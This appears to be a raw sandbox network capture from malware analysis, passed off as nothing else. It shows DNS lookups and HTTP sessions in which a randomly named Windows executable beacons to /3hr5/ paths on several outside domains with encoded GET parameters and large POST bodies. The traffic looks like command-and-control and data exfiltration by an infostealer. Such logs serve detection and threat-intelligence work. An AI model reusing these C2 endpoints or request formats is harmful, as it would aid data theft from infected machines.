                                                                                                                              Dec 4, 2023 15:28:39.103446960 CET1.1.1.1192.168.11.200x3048No error (0)opleverdossier.online91.184.0.200A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:06.518049955 CET1.1.1.1192.168.11.200x1ce0No error (0)www.fisiocomoterapia.comfisiocomoterapia.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:06.518049955 CET1.1.1.1192.168.11.200x1ce0No error (0)fisiocomoterapia.com89.117.169.140A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:19.132354975 CET1.1.1.1192.168.11.200x547aName error (3)www.buben.consultingnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:29.529067039 CET1.1.1.1192.168.11.200xb510Name error (3)www.extragrandifirme.comnonenoneA (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 50131 | 54.36.145.173 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:22:26.038505077 CET | 535 | OUT
GET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.hormigonesmil.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:22:27.461071014 CET | 590 | IN
HTTP/1.1 301 Moved Permanently
                                                                                                                              date: Mon, 04 Dec 2023 14:22:27 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              server: Apache
                                                                                                                              x-powered-by: PHP/7.4
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              wpo-cache-status: not cached
                                                                                                                              wpo-cache-message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://hormigonesmil.com/3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVE
Dec 4, 2023 15:22:27.461147070 CET | 238 | IN
Data Ascii: x2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38
x-iplb-request-id: BF60E3DC:C3D3_362491AD:0050_656DE0A2_DBF11:6292
x-iplb-instance: 52473
connection: close
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 50132 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:22:51.031161070 CET | 816 | OUT
POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=P5CevVVTq9zocJC8TOD0ZSGWEH3xhCc0CSbXzq0daL60Tv549gQ5Hl4uFzi/c05h+RwCsMD8+m38Pr7QxaMPq1x7+1/3pBqiPwCF5JXx1MCATTSyDhqDW7ZfTrvQsaNoywx6f6CXKJeKh57DSQMadfrChdswZwfkctDvLm2r5slKKBz0ZA==
Dec 4, 2023 15:22:51.160867929 CET | 634 | IN
HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:22:51 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 50133 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:22:53.683531046 CET | 1156 | OUT
POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:22:53.813286066 CET | 634 | IN
HTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:22:53 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 50134 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:22:56.339684963 CET | 12914 | OUT
POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:22:56.464566946 CET2626OUTData Raw: 6a 6c 7a 77 6c 54 54 66 5a 42 38 59 59 69 41 54 49 33 4c 71 33 43 6c 76 56 6b 68 6f 48 35 38 6b 52 6e 75 2f 72 37 4c 41 33 6d 6e 57 33 78 77 56 46 2b 7a 70 78 6c 45 4a 64 74 35 6c 41 49 33 4e 64 57 46 77 50 50 65 36 46 52 71 77 67 56 2b 50 44 74
                                                                                                                              Data Ascii: jlzwlTTfZB8YYiATI3Lq3ClvVkhoH58kRnu/r7LA3mnW3xwVF+zpxlEJdt5lAI3NdWFwPPe6FRqwgV+PDt1UtGemmPTk96wov9GXD+2VVdIC3XvB952g38vn9TPtkZJNsgA0UrnyLF4ifkw16MQur+JW4RGdvA4Maenks/vj4K6Ri95cLvHQNKJzv0mRjIEGPKBKwMtWO/8KcWIFWLYASCZCug6KPs4576CsNEt6AvUHTExayLC
                                                                                                                              Dec 4, 2023 15:22:56.464786053 CET12914OUTData Raw: 39 64 65 4a 64 4a 7a 5a 68 33 61 43 6f 66 54 37 4a 31 68 30 37 49 6f 4a 72 33 51 4e 6b 65 5a 4c 6c 34 50 36 69 67 79 58 47 37 6e 38 6c 76 63 30 76 39 65 34 69 4f 6a 64 6a 2b 57 74 57 66 6d 33 43 4f 69 78 53 6c 4d 4f 54 78 77 75 71 69 6a 6b 6b 42
                                                                                                                              Data Ascii: 9deJdJzZh3aCofT7J1h07IoJr3QNkeZLl4P6igyXG7n8lvc0v9e4iOjdj+WtWfm3COixSlMOTxwuqijkkBxwgRV89IQHGJHKkzx9tOUJsVbgO7nAPz9hi+LqFDm0k112FVikShVX5nV6ZNii14wFEg2FQcyKop3SdH16oxulvq7gxeaJDUFBhdRRB0My8yERUtVOdwl/qSfGVOLY0tpV4lGFQkLd+D9/xOAZ8KniV5uvXsc+k6W
                                                                                                                              Dec 4, 2023 15:22:56.464947939 CET2626OUTData Raw: 77 6c 78 74 54 4d 6b 6f 39 77 42 49 79 45 53 46 32 7a 52 48 79 2b 38 45 56 4a 54 4b 58 64 64 69 35 69 6a 75 79 33 78 33 5a 6b 31 5a 65 4c 2b 45 7a 6e 65 74 63 46 75 53 56 53 44 61 77 42 77 5a 4c 51 41 67 62 43 50 5a 4c 4a 54 6b 39 74 74 6d 42 74
                                                                                                                              Data Ascii: wlxtTMko9wBIyESF2zRHy+8EVJTKXddi5ijuy3x3Zk1ZeL+EznetcFuSVSDawBwZLQAgbCPZLJTk9ttmBtZCcSM/IlVaxMv7MX+Cqe/gAdKbpwZ+nOcR3A5a1GmMyMPtkYd5tqdivDkGWONy9p1RCby+pCbIIkaVuHjEWIwJ1M4N7c1hw1Ww9BfuILMTdEQ9TVuBsPeQYGtFszQYcEY39S6p2N+gGLIau5mKWLcHrnl0OYOtf1R
                                                                                                                              Dec 4, 2023 15:22:56.465219021 CET7770OUTData Raw: 66 34 44 6e 78 63 33 4a 33 41 68 62 66 59 6a 45 5a 64 50 79 31 52 2f 39 38 6d 4d 2f 6e 37 74 35 38 59 78 7a 62 54 50 52 4e 4a 41 35 48 32 2f 75 46 72 79 31 55 4e 69 6e 76 44 46 6f 50 65 6c 6a 5a 6d 52 68 6a 38 44 6b 34 45 4d 61 6a 31 47 47 4e 35
                                                                                                                              Data Ascii: f4Dnxc3J3AhbfYjEZdPy1R/98mM/n7t58YxzbTPRNJA5H2/uFry1UNinvDFoPeljZmRhj8Dk4EMaj1GGN5vS1RLqTgB01rG9gM8hDQO87CasmGp/AR08ULyp1cEVrddrv19o6rpXXT+FvBozYbahZOHZ4YekFOr7+14PRj+uQqruGikdUzRT7akMFgaJ5gmmxt4m7rjzGtLLa3WP1XhbCi5edAjIPMqMWJZFXrYTIIoJaImjSvj
                                                                                                                              Dec 4, 2023 15:22:56.588649988 CET1340OUTData Raw: 37 6d 70 33 42 38 32 49 32 4e 51 7a 33 6d 38 77 72 43 54 33 31 76 52 47 4b 41 55 6f 73 6c 31 51 66 53 6f 6f 56 47 30 43 32 56 67 74 64 51 62 61 6f 36 48 36 7a 62 4f 66 4e 32 64 54 34 41 48 6f 76 56 42 6d 55 34 70 6a 4c 57 4f 4c 74 49 50 64 47 6b
                                                                                                                              Data Ascii: 7mp3B82I2NQz3m8wrCT31vRGKAUosl1QfSooVG0C2VgtdQbao6H6zbOfN2dT4AHovVBmU4pjLWOLtIPdGkh7kI4HswGBqW9ZTnZv82/He7bkXwX8tFoxpSdHNNRUr3mI0VqJjDx7+rDqS1kSbAQ5l4kSt5yJ5o0u4PU3Q/XtQBpRWX6tv9Zd26XJUoFJC6ekBylGvAFOhUEuJYo1ur64kXkAwVPTiCNLFsV2EMuNnliTU5F+2no
                                                                                                                              Dec 4, 2023 15:22:56.588710070 CET3912OUTData Raw: 50 64 4b 37 45 36 46 57 32 65 2f 37 2b 58 37 76 51 4c 65 4c 34 79 6a 4b 49 71 37 65 63 64 6d 69 6f 4c 51 6f 62 55 4b 6c 50 37 66 67 32 4b 41 79 77 7a 46 6b 4c 4e 41 78 67 6d 52 44 66 50 6c 65 6f 48 36 6e 73 75 2b 7a 6e 36 44 30 43 70 6e 53 45 30
                                                                                                                              Data Ascii: PdK7E6FW2e/7+X7vQLeL4yjKIq7ecdmioLQobUKlP7fg2KAywzFkLNAxgmRDfPleoH6nsu+zn6D0CpnSE0mnzgS5IQyijHbAmXZ/OZJPU3DESn8MUxcji2e5gOVHqqfrtTjK5iEtoPE8ASU6BSoUFPcPWmVgFoBMZ7dC9ppu/RcTkgkF40lYLVqpcUF68TvKPtPfgxg8sHpo5PXgrbHoBWifADnX4+G7sMry5XPCsQIcmmy8DVL
                                                                                                                              Dec 4, 2023 15:22:56.588932037 CET9822OUTData Raw: 77 78 50 42 6d 6f 65 67 62 37 63 39 6f 48 35 5a 30 58 33 47 69 38 63 47 6c 32 42 6e 78 65 4a 58 32 31 67 69 65 76 65 56 35 62 68 43 50 41 6e 50 58 58 75 35 33 38 45 31 55 36 34 71 35 4d 56 38 79 43 44 59 73 48 5a 35 65 35 77 2f 52 6c 6b 4a 49 68
                                                                                                                              Data Ascii: wxPBmoegb7c9oH5Z0X3Gi8cGl2BnxeJX21gieveV5bhCPAnPXXu538E1U64q5MV8yCDYsHZ5e5w/RlkJIhKGo3cWTs75G6Dj49Ew/65rp67aVBAs9W/FR9JmCTsDfu0VxzguY74ZbAwTTK/gWrTr7Ta/L5jGnJHmvaemtWg6pPHYi3xM3oU4TmWLOVV8Pj3LemaDk0YlAxZvBdI7XptWEBFF28UEJSXOeMutmBzh3J01hM0GP+s
Dec 4, 2023 15:22:56.715848923 CET | 634 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Date: Mon, 04 Dec 2023 14:22:56 GMT
Server: Apache
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 50135 | 74.208.236.243 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:22:58.994398117 CET | 535 | OUT | GET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1
Host: www.homesteadmath.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:22:59.122128010 CET | 824 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 626
Connection: close
Date: Mon, 04 Dec 2023 14:22:59 GMT
Server: Apache
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 50136 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:12.728913069 CET | 807 | OUT | POST /3hr5/ HTTP/1.1
Host: www.ritualyoga.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.ritualyoga.org
Referer: http://www.ritualyoga.org/3hr5/
Connection: close
Content-Length: 184
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=oG+ONcKgcM1YKlwt+1BwegOcbNtT7fJbOT34fn0HyIuaiUHiDBC3LdjwilBNzA+AXg/tgX/Z9JZurjTmQ5bwoMzVrymRwupI/TvTh8vyNKCz6RGRAOA7mI+E0W8zRa4iVwJRybooimiW0/plcu1XUfX1SNCO/6iVdRz+v8mfPSufFY6s8A==
Dec 4, 2023 15:23:12.870420933 CET | 1328 | IN | HTTP/1.1 404 Not Found
server: nginx/1.14.2
date: Mon, 04 Dec 2023 14:23:12 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
x-request-id: 958a918b-9862-4cf0-b51a-9d975ac6c37d
x-runtime: 0.027786
content-encoding: gzip
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 50137 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:15.367646933 CET | 1147 | OUT | POST /3hr5/ HTTP/1.1
Host: www.ritualyoga.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.ritualyoga.org
Referer: http://www.ritualyoga.org/3hr5/
Connection: close
Content-Length: 524
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:15.526899099 CET | 1328 | IN | HTTP/1.1 404 Not Found
server: nginx/1.14.2
date: Mon, 04 Dec 2023 14:23:15 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
x-request-id: e9de628b-bce2-4ae6-911c-2a6ac0d4a849
x-runtime: 0.047968
content-encoding: gzip
connection: close
                                                                                                                              Data Ascii: 5~Q95A(*%4KO$"cj]J`%LpK,$eC5KQfd)(Bo4/>cGzfGwCcZ`,0dIsQ2iKS=fplh:ATk`#b?$MH(EE7J'Ww1<(gbLr.eF
                                                                                                                              Dec 4, 2023 15:23:15.527041912 CET1328INData Raw: fb e4 41 c8 a1 a3 29 80 be 33 9f c1 d6 37 9c 04 e0 de 8b e8 9d a0 f1 f8 21 83 74 d8 70 ec 96 7f 0b 7f 1d ea 9c 19 0e 2c 8c c3 31 bc 7f f3 26 3e de d3 58 ff 62 7f 35 a0 63 af 31 07 a2 5b 12 5d 26 4d e8 d3 db f1 09 2c 8f 27 33 c6 0d 38 70 c0 09 c7
                                                                                                                              Data Ascii: A)37!tp,1&>Xb5c1[]&M,'38p|h0#h<z!8:%{6Xe35AA_NX?e]]/n3)5 R)e)bonr**,bKcZ:lCR~5YD^)96n
                                                                                                                              Dec 4, 2023 15:23:15.527101040 CET1328INData Raw: e3 64 d2 89 16 eb 2f 5a e8 47 10 5f d3 5b d8 05 2b f5 4b 0d c9 08 15 7e d7 4a d9 04 4c 00 28 bc 5e 9f 49 79 ee 52 f8 e0 63 33 93 f9 50 43 4d a9 ee 09 00 92 29 51 15 ec a0 84 8e 50 82 6a 1a 5c 8c a1 e3 de f5 40 99 14 07 e7 a6 33 e3 cc 86 a8 05 b6
                                                                                                                              Data Ascii: d/ZG_[+K~JL(^IyRc3PCM)QPj\@3!7dXmq&!`U=`-thfaj`i(j UiDKULzDMT=ejOf!AAmX$TS;#C3!lo[TSrOfoQ<8P7<
                                                                                                                              Dec 4, 2023 15:23:15.527153015 CET579INData Raw: e5 ce ef cc af 35 76 f6 ae dc 9d 6f 85 32 6f 75 ed 51 ad 72 df b5 df 97 67 b7 8b c5 bc f4 f1 fb e2 6e b7 de 6d 0e fd c5 de fb 59 78 75 f1 b1 f4 f9 b4 2a ac e1 6f b0 42 bc aa 21 af f5 c8 7b 0b f2 de bf b8 54 84 37 34 e4 7b 79 fb 3e 85 57 1c d6 6f
                                                                                                                              Data Ascii: 5vo2ouQrgnmYxu*oB!{T74{y>Wo$nhi2[##J+Vt]Bz %D/W=e/~ctyi\jy6{zqUham1ysv^m{5CCem'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 50138 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:18.008508921 CET | 1340 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.ritualyoga.org
                                                                                                                              Referer: http://www.ritualyoga.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:18.513305902 CET | 379 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:23:18 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 173
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.14.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 50139 | 216.40.34.41 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:20.648096085 CET | 532 | OUT | GET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.ritualyoga.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:20.773152113 CET | 1328 | IN | HTTP/1.1 200 OK
                                                                                                                              server: nginx/1.14.2
                                                                                                                              date: Mon, 04 Dec 2023 14:23:20 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-xss-protection: 1; mode=block
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              x-download-options: noopen
                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                              etag: W/"cd0e473ec8f9e0891230436de0f95a52"
                                                                                                                              cache-control: max-age=0, private, must-revalidate
                                                                                                                              x-request-id: 639a3f42-dcdf-483d-8933-73bc263f07db
                                                                                                                              x-runtime: 0.011616
                                                                                                                              connection: close
                                                                                                                              Data Ascii: 1755<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>ritualyoga.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 50140 | 37.97.254.27 | 80 | 8076 | C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:26.404582024 CET | 795 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Ascii: TZd=bti3PetBKdxm+dlcE6MKBarvv6yF9QaGA1eMdoymhxQltH8oAibYb3frSvz49PhQfjapy++Riwkkwhh9ggVR61+hJr81p04nI50LJXvH6vSWpBg5jSO8Bp9X1Kok1kIAFwva3QWrvh9PnB5X52TIgRfItkKiCaw30YX5pnFAmHmhCcurAg==
Dec 4, 2023 15:23:26.576653957 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID: 10
Source IP: 192.168.11.20
Source Port: 50141
Destination IP: 37.97.254.27
Destination Port: 80
PID: 8076
Process: C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 15:23:29.103007078 CET | 1135 | OUT | POST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.rocsys.net
                                                                                                                              Referer: http://www.rocsys.net/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
Dec 4, 2023 15:23:29.280168056 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID: 11
Source IP: 192.168.11.20
Source Port: 50142
Destination IP: 37.97.254.27
Destination Port: 80
PID: 8076
